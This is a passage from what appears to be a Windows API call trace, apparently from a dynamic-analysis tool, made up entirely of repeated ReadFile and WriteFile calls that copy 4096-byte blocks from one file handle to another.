lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.170] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.170] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.170] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.170] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.170] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.170] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.170] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.171] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.171] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.171] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.171] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.171] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.171] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.171] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.172] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.172] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.172] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.172] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.172] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.173] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.173] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.173] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.173] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.173] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.173] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.173] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.173] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.174] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.174] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.174] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.174] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.174] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.174] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.174] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.175] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.175] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.175] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.175] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.175] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.175] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.175] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.176] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.176] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.177] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.177] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.177] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.177] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.177] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.177] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.178] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.178] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.178] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.178] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.178] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.178] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.178] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.178] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.179] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.179] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.179] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.179] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.179] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.179] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.179] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.180] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.180] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.180] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.180] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.180] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.180] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.180] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.181] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.181] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.181] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.181] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.181] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.181] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.181] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.182] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.182] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.182] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.183] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.183] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.183] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.183] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.183] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.184] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.184] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.184] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.184] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.184] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.184] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.185] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.185] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.185] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.185] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.185] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.185] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.185] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.185] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.186] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, 